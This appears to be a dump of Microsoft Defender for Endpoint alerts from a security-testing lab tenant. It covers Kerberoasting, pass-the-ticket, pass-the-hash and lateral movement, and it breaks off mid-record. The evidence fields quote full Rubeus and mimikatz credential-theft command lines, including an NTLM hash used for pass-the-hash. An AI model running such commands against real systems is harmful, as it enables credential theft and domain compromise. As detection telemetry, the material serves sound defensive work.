"c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:07:46.14Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001153595901199_-1742865935
e332b21a-1477-40dc-9267-e888f570a686
486
MicrosoftDefenderForEndpoint
2022-09-30T06:15:59.5901388Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:13:28.7769316Z
2022-09-30T06:13:28.7769316Z
Suspicious service launched
A suspicious service was started on this device. Attackers might use services to launch malicious commands or programs. This technique is used to maintain persistence or elevate privileges on the target device.
Execution
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
a5af9713-6eea-4d23-9bdc-9cab19f19092
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1569.002" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "defender", "domainName": "MSDXV2" }, { "accountName": "msdefender", "domainName": "MSDXV2" } ], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } } ]
[ { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:15:59.72Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-09-14T17:17:59.9661798Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 644, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-09-30T06:13:28.5321636Z", "processId": 7308, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:15:59.72Z", "fileName": "services.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-09-14T17:17:59.2357908Z", "parentProcessFileName": "wininit.exe", "parentProcessFilePath": null, "parentProcessId": 580, "processCommandLine": "services.exe", "processCreationTime": "2022-09-14T17:17:59.9661798Z", "processId": 644, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "86b4d657f45a99da13732c5ad91faee64607074e", "sha256": "751cd7ab78b18a2d8a55c47ca75b90a14234ac974d81be5f198d301b59183873", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-20T12:55:53.1166667Z
Suspicious
None
steve
malicious.io
S-1-5-21-2159906967-4174806019-1002223092-1107
null
steve@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072962440564421_38923631
bdbef9b4-af97-4ac8-812b-2d008732fb04
975
MicrosoftDefenderForEndpoint
2022-12-22T08:57:24.0564629Z
2022-12-22T08:59:28.19Z
null
2022-12-22T08:47:52.0649455Z
2022-12-22T08:47:52.0657273Z
Possible use of the Rubeus kerberoasting tool
Activity indicating the use of the Rubeus tool was observed on this endpoint. This tool can perform kerberoasting, pass-the-ticket, and other attack techniques that take advantage of Kerberos authentication. During these attacks, attackers often request Kerberos tickets for an account's service principal name (SPN). They then decrypt the tickets to get plaintext credentials associated with the account. Alternatively, they can perform the pass-the-ticket technique to authenticate directly without having to decrypt the obtained tickets.
SuspiciousActivity
New
Medium
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
6606ef29-d293-4f24-a7c5-334dcb40b412
null
null
null
[ "T1558.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "test.domain", "firstSeen": "2022-12-08T01:04:21.9057174Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08" } } ]
[ { "aadUserId": null, "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:57:24.1Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:57:24.1Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:38:52.5569028Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 748, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-12-22T08:47:50.8661147Z", "processId": 4216, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:57:24.1Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:47:50.8661147Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4216, "processCommandLine": "\"cmd\" /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-12-22T08:47:51.6930217Z", "processId": 5228, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "ronhd@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:57:25.04Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:47:51.6930217Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 5228, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-12-22T08:47:51.8048258Z", "processId": 2536, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "ronhd@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T17:30:34.8833333Z
Suspicious
None
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043434790542507_650999825
800cbead-8eca-48b2-9281-1140eb27aeca
741
MicrosoftDefenderForEndpoint
2022-11-18T04:44:39.0542693Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T04:37:10.8013687Z
2022-11-18T04:48:53.2431943Z
Suspicious User Account Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1033", "T1087", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "tmtower-book", "firstSeen": "2022-10-10T06:18:04.255Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Takeshi", "domainName": "TMTOWER-BOOK" } ], "mdatpDeviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9", "onboardingStatus": "Onboarded", "osBuild": 22621, "osPlatform": "Windows11", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "22H2", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "Takeshi", "detectionStatus": null, "deviceId": null, "domainName": "TMTOWER-BOOK", "entityType": "User", "evidenceCreationTime": "2022-11-18T04:44:39.08Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-7316772-2057538409-3008203053-1001", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:18:14.6166667Z
Suspicious
None
jeff
corp.local
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-12T09:28:24.68Z
Suspicious
None
darol
prod.env
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001152860039830_2026663167
2cdd3046-d3cf-4a2d-b6eb-042644822492
486
MicrosoftDefenderForEndpoint
2022-09-30T06:14:46.0040019Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:13:05.4830293Z
2022-09-30T06:13:05.4830293Z
Pass-the-ticket attack
A .kirbi file, a known file extension for Kerberos tickets containing local authenticated users credentials, was observed being created on the machine. This behavior might be associated with an attacker trying to move laterally in the network using stolen user credentials as part of Pass-The-Tickets” attack
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
dc47cd98-e905-40ed-ac04-59c4ff6b97ee
msftadmin@msdxv2.m365dpoc.com
null
null
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-09-30T06:14:46.13Z", "fileName": "ticket.kirbi", "filePath": "C:\\M365DAttack\\Admin-Tickets", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "620f1111327039366b6d83d7b76638945d191350", "sha256": "46f289f8920970813e6c9dd0c5e2ae33494940d0ed896d705d1c7e2a36208a0e", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043450333029341_-939218427
51fc30c6-87e5-49d3-97dc-446fb0a0459a
741
MicrosoftDefenderForEndpoint
2022-11-18T05:10:33.302949Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:09:24.7135164Z
2022-11-18T05:09:32.3483944Z
Multiple dual-purpose tools were dropped
Multiple known public tools, which could also be used for malicious reasons were dropped on this device. Attackers might download or copy multiple dual-purpose tools to the target device to perform various attack stages including, credential theft, privilege escalation, and lateral movement.
LateralMovement
Resolved
High
47
PartiallyInvestigated
TruePositive
SecurityTesting
WindowsDefenderAtp
e0e0ea40-b5ca-4cbf-8380-24119951f847
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003", "T1021", "T1105", "T1555", "T1558.003", "T1570" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:10:33.3766667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:33.3766667Z", "fileName": "Rubeus.exe", "filePath": "C:\\M365DAttack\\Rubeus", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Remediated", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:33.3766667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "NotFound", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:33.3766667Z", "fileName": "PsExec.exe", "filePath": "C:\\M365DAttack\\PsTools", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "b97761358338e640a31eef5e5c5773b633890914", "sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:33.3766667Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Clean" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:33.3766667Z", "fileName": "Get-KRBTicket.ps1", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "8cd78c31fcbe15d0c3ae78c06e5136983b438586", "sha256": "5dbd299b13a978274d1a2bf59b58abc66277896c3ab867783f226750d620e4e1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:33.3766667Z", "fileName": "Step3-PasstheHash.txt", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "b8c0e6116af2318bac405b294f4ec4dd0689acfe", "sha256": "b2d761caea2505311e7e239a4988be8decbf842ff3c27a1ffeebd45774951df6", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:48:46.11Z
Suspicious
None
jeff
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
10,120
cmd.exe /c whoami
2022-12-22T08:47:28.9856445Z
6,324
2022-12-22T08:47:11.8139068Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T04:51:48.7833333Z
Suspicious
Active
analyst
TMTOWER-BOOK
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
11,108
"mimikatz.exe" privilege::debug "kerberos::ptt C:\M365DAttack\Admin-Tickets" exit
2022-11-18T04:48:53.2444004Z
14,616
2022-11-14T04:36:16.5242809Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
83b06aa80899050e5d4132992e36b5b8f14b64e9
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:48:46.11Z
Suspicious
None
root
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
10,120
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv8.m365dpoc.com /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait
2022-12-22T08:47:28.9856445Z
6,324
2022-12-22T08:47:11.8139068Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
da638043451254856130_207704893
c9964f76-de47-435b-9cb1-496689dcb261
741
MicrosoftDefenderForEndpoint
2022-11-18T05:12:05.4856454Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:09:32.0366644Z
2022-11-18T05:14:15.9918082Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
Resolved
Medium
49
PendingApproval
TruePositive
SecurityTesting
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "rnd.local", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "High", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV2", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:12:05.5433333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "User", "evidenceCreationTime": "2022-11-18T05:12:05.5433333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-0-0", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:12:05.5433333Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "NotFound", "remediationStatusDetails": "The system cannot find the file specified.", "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": 